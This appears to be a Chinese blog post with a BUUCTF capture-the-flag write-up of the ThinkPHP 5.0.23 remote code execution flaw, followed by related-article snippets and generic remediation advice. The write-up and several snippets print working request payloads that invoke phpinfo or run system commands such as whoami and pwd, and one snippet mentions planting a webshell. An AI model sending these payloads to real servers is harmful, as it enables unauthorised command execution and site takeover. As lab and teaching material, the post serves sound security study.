[ThinkPHP]5.0.23-Rce 1

最新推荐文章于 2025-05-31 11:26:04 发布

原创最新推荐文章于 2025-05-31 11:26:04 发布 · 425 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全 #密码学 #web安全 #安全 #安全威胁分析

BUUCTF 专栏收录该内容

22 篇文章

订阅专栏

[ThinkPHP]5.0.23-Rce 1

根据题目知道这是一个5.0.23的PHP RCE，话不多说直接上扫描器

检测出Payload

url地址：
?s=captcha&test=-1 

Post表单参数: 
_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1

HackBar构造payload，访问成功执行到phpinfo页面

ctrf+f 成功找到flag

flag{9bf3ef01-5e80-42a0-b544-9808a1fd3bb2}

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

TazmiDev

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce

qq_51577576的博客

10-02

2924

[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。

thinkphp5.0.23rce复现

Cwillchris的博客

03-13

857

其 5.0.23 以前的版本中，获取 method 的方法中没有正确处理方法名，导致攻击者可以调用 Request 类任意方法并构造利用链，从而导致远程代码执行漏洞。从图中可以看出，docker0网卡发生了错误，并且没有常见的IPV4，这里基本可以确定是docker的网络出现了问题 , 可以通过重置docker网络解决。可以发现docker的网卡正常了，并且通过物理机访问docker容器中的应用也已经正常。这样就掌握了漏洞利用的完整过程。启动环境，启动环境会先拉取镜像，网络不好可能会拉取不下来的。

参与评论您还未登录，请先登录后发表或查看评论

thinkphp v5.0.23 rce

qq_43647462的博客

08-23

3838

thinkphp v5.0.23 rce 复现 Buchiyexiao. thinkphp是一个轻量级的框架，其中在thinkphp5版本中出现了很多命令执行漏洞，本文分析采用的代码使用的是thinkphp版本v5.0.23（目的是匹配docker搭建的thinkphp环境的版本）漏洞位置 thinkphp5的主要漏洞位置位于处理请求的Request类中，其中存在method方法，简单阅读发现该方法目的是为了获取当前的请求类型，因为我没有传入任何请求，所以get，post等的数组为空其中var

漏洞复现Thinkphp的5.0.23-rce

2401_86120759的博客

10-21

799

实现框架的核心类Requests的method方法实现表单请求类伪装，默认为$_POST[‘_method’]变量，却没有对_method属性进行严格校验，可以通过变量覆盖Requests类的属性，在结合框架特性实现对任意函数的调用实现任意代码执行。查看后台输入语句：_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd。网站后拼接index.php/?s=captcha进行访问。建议进行ThinkPHP版本更新。

Thinkphp5.0.23-rce漏洞复现

qq_64875725的博客

06-02

2833

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {

ThinkPHP--5.0.23-rce远程代码执行

m0_74402888的博客

05-03

1045

实现框架的核心类Requests的method方法实现表单请求类伪装，默认为$_POST[‘_method’]变量，却没有对_method属性进行严格校验，可以通过变量覆盖Requests类的属性，在结合框架特性实现对任意函数的调用实现任意代码执行。攻击者可向缓存文件内写入PHP代码，导致远程代码执行。

【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现

m0_75036923的博客

09-07

1014

【代码】【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现。

ThinkPHP5 5.0.23-rce远程代码执行漏洞复现

qq_45079558的博客

09-08

549

其版本5中，由于框架对控制器名没有进行足够的检测，会导致在没有开启强制路由的情况下可执行任意方法，从而导致远程命令执行漏洞。通过echo命令写入 Webshell 文件,首先将一句话木马进行Base64 编码。判断是否存在漏洞：访问/index.php?s=captcha页面，会出现如下报错。切换目录到vulhub/thinkphp/5.0.23-rce下。使用HackBar 插件发送 POST 请求。端口为:8080,访问网站，搭建成功。访问shell.php，使用蚁剑连接。

Thinkphp5.0.23-rce

jiangzhen5566的博客

05-31

407

这块代码就是赋值,将他们赋值，filter = ['system'] ,method = ['get'] , server = ['REQUEST_METHOD' => 'whoami']开始时候$options[]数组为空，经过$this->input = file_get_contents('php://input');所以构造出来了call_user_func_array("system","whoami");最后的最后执行了命令。但是不知道为什么执行不了命令，应该是执行了，传马直接给杀了。

Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现（六十四）

把自己活成一道光，因为你不知道，谁会借着你的光，走出了黑暗。请保持心中的善良，因为你不知道，谁会借着你的善良，走出了绝望。请保持你心中的信仰，因为你不知道，谁会借着你的信仰，走出了迷茫。请相信自己的力量，因为你不知道，谁会因为相信你，开始相信了自己....

06-23

2080

这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装，我们进入 ThinkPHP漏洞环境，可以 cd ThinkPHP，然后通过 ls 查看可以搭建的靶场，目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。然后我们在浏览器输入就可以访问靶场环境。

ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1

08-03

ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1

thinkphp 5.0.23 rce 漏洞复现

m0_65764670的博客

05-29

782

这里的rce是远程命令，此漏洞利用过程为访问/index.php?进入靶场文件使用docker-compose up -d拉取镜像。使用info 0查看适用版本。设置靶机和攻击机IP。

BUUCTF-Real-ThinkPHP]5.0.23-Rce

02-02

1091

[ThinkPHP]5.0.23版本，RCE远程代码执行漏洞！

ThinkPHP5.0.0~5.0.23路由控制不严谨导致的RCE

shelter1234567的博客

01-22

1555

本次我们继续以漏洞挖掘者的视角，来分析thinkphp的RCE。

Thinkphp5.0.23 rce（远程代码执行）

Lucky1youzi的博客

01-20

1078

Thinkphp5.0.23 rce（远程代码执行）

ThinkPHP-5.0.23新的RCE漏洞测试和POC

weixin_30342827的博客

01-12

2069

TP5新RCE漏洞昨天又是周五，讨厌周五曝漏洞，还得又得加班，算了，还是先验证一波。新的TP5RCE，据说发现者因为上次的RCE，于是又审计了代码，结果发现的。TP5也成了万人轮啊。测试环境搭建 windows下phpstudy，然后下载tp5.0.23到相应的www目录下 linux，安装启动apache和php，下载tp5.0.23到相应www目录下 mac（本机）启动ap...

thinkphp 5-rce

最新发布

10-22

### 漏洞详情 - **漏洞形成原因**：在ThinkPHP 5.0.23以前的版本中，获取method的方法没有正确处理方法名，使得攻击者能够调用Request类任意方法并构造利用链，最终导致远程代码执行漏洞。另外，ThinkPHP 5.x出现由于变量覆盖而引起的RCE，其根本源于thinkphp/library/think/Request.php中method方法可进行变量覆盖，通过覆盖类的核心属性filter导致rce，攻击点较多且部分存在限制条件 [^1][^2]。 - **利用方式**： - 一种是访问靶机地址+端口号进入首页，用Burp抓包修改传参方式为Post，传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"，其中pwd为系统执行命令，可进行一系列操作 [^1]。 - 还可利用system函数远程命令执行，利用bp抓包，修改请求方式，使用poc进行攻击 [^3]。 - 存在类似这样的攻击url：http://127.0.0.1/thinkphp5.1beta/public/index.php?s=index/\think\Container/invokefunction&function=call_user_func&vars[0]=phpinfo&vars[1]=1 [^4]。 - **其他影响**：攻击者可向缓存文件内写入PHP代码导致远程代码执行。由于框架对控制器名没有进行足够的检测，在没有开启强制路由的情况下可能存在getshell漏洞 [^3]。 ### 解决方案文档中未提及ThinkPHP 5远程代码执行（RCE）漏洞的解决方案。一般而言，对于此类漏洞可采取以下通用措施： ```php // 及时更新框架版本到官方推荐的安全版本，以修复已知漏洞 // 例如在composer.json中指定安全版本 { "require": { "topthink/framework": "5.x.x" // 替换为安全版本号 } } // 对用户输入进行严格的过滤和验证，防止恶意代码注入 function filter_input_data($input) { $safe_input = htmlspecialchars($input, ENT_QUOTES, 'UTF-8'); return $safe_input; } // 开启强制路由，避免因控制器名检测不足导致的安全问题 // 在ThinkPHP配置文件中开启强制路由 return [ 'url_route_must' => true ]; ```